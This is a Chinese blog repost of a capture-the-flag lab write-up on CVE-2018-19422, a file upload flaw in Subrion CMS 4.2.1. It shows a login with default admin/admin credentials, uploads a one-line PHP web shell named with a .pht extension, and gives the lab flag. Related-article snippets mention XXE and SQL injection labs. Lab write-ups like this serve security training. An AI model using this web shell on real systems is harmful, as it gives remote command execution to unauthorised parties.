春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

这篇具有很好参考价值的文章主要介绍了春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、题目

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

 靶标介绍:

Subrion CMS 4.2.1 存在文件上传漏洞

进入题目:

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全admin/admin 

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全  点击设置:

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

 后台管理主页:

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

 上传页面:

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

上传目录:

/panel/uploads/

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全  查看上传位置:

system.pht

<?php system($_GET[1]);phpinfo();?>

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

 上传位置:

 uploads/system.pht

春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞),i春秋,web安全,安全,网络安全

 flag{24505f02-d430-4d3b-905e-17349e09c34c}文章来源地址https://www.toymoban.com/news/detail-666496.html

到了这里,关于春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • [春秋云镜]CVE-2014-3529

    [春秋云镜]CVE-2014-3529

    Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。 春秋云镜开启靶场: http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/ 一:使用python开启一个web服务 python -m http.server 80 二:

    2023年04月19日
    浏览(73)
  • 春秋云镜 CVE-2022-24124

    春秋云镜 CVE-2022-24124

    Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 网上poc,获取版本号 /api/get-organizations?p=123pageSize=123value=cfxsortField=sortOrder=field=upd

    2024年02月13日
    浏览(11)
  • [春秋云镜]CVE-2020-19960,CVE-2020-19961

    [春秋云镜]CVE-2020-19960,CVE-2020-19961

    zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag) 春秋云镜开启靶场: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/ 后台 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php 账号admin 密码admin 登录进来找上传点  http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1

    2024年02月14日
    浏览(16)
  • 1、[春秋云镜]CVE-2022-32991

    1、[春秋云镜]CVE-2022-32991

      靶场提示:该CMS的welcome.php中存在SQL注入攻击。   NVD关于漏洞的描述:   注入点不仅在 eid 处!!! (1)既然NVD说漏洞在welcome.php处,且参数为 eid ,先注册账号。 (2)登录账号后,发现页面就是welcome.php。 (3)随便点一个 action ,点点 submit ,会发现url中的n参数

    2024年02月11日
    浏览(13)
  • 春秋云镜cve-2022-32991wp

    春秋云镜cve-2022-32991wp

    首先看靶标介绍:该CMS的welcome.php中存在SQL注入攻击 访问此场景,为登录界面,可注册,注册并登陆后找可能存在sql注入的参数,尝试在各个参数后若加一个单引号报错,加两个单引号不报错,说明此参数可能存在sql注入,经过尝试在 http://xxx.ichunqiu.com/welcome.php?q=quizstep=2ei

    2024年02月12日
    浏览(14)
  • [春秋云镜] CVE-2022-28060 详细讲解

    [春秋云镜] CVE-2022-28060 详细讲解

    目录 前期准备 工具+环境 渗透测试 靶场提示 靶场测试 burpsuite SQLmap Victor CMS v1.0 /includes/login.php 存在sql注入 1.打开开启的靶场,右边发现一个登入界面   2.任意输入账号密码,打开burpsuite进行抓包 3.将抓到的包放入一个文件,使用SQLmap去爆破 4.爆破出来之后,选择y生成文件,

    2024年02月13日
    浏览(29)
  • 春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

    春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

    一、题目 二、burp改包   进入题目: 是一个登录页面   这题确实没什么思路,所以看了官方POC: 因为这个漏洞已经被国家cnnvd收入了 burp抓包:不需要登录,刷新即可。  发送到重放器:根据官方POC更改即可: 这两个参数需要用本机抓包的:  如图: 在次访问登录网站,

    2024年02月08日
    浏览(9)
  • weblogic 任意文件上传漏洞 (CVE-2018-2894)

    weblogic 任意文件上传漏洞 (CVE-2018-2894)

    搭建环境: docker-compose up -d  查看weblogic后台登录密码:docker-compose logs | grep password 漏洞成因:weblogic管理端未授权的两个页面存在任意文件上传getshell漏洞,可直接获取webshell。 影响版本:WebLogic :10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3 漏洞地址:/ws_utc/begin.do、/ws_utc/config.do 默认端

    2023年04月08日
    浏览(10)
  • Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

    Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

    目录 weblogic  漏洞环境准备 漏洞复现 修复建议 WebLogic 是 美国Oracle公司 出品的一个 application server ,确切的说是一个基于 JAVAEE 架构的 中间件 , WebLogic 是用于 开发 、集成、部署和管理大型分布式 Web 应用、 网络应用 和 数据库应用 的 Java应用服务器 。将 Java 的动态功能和

    2024年02月01日
    浏览(9)
  • 帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

    帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

    漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统( CMS ),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以 实现任意代码执行 ,EmpireCMS7.5版本中的/e/class/moddofun.php文件的 LoadInMod函数 存在安全漏洞,攻击者可利用该漏

    2023年04月13日
    浏览(11)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包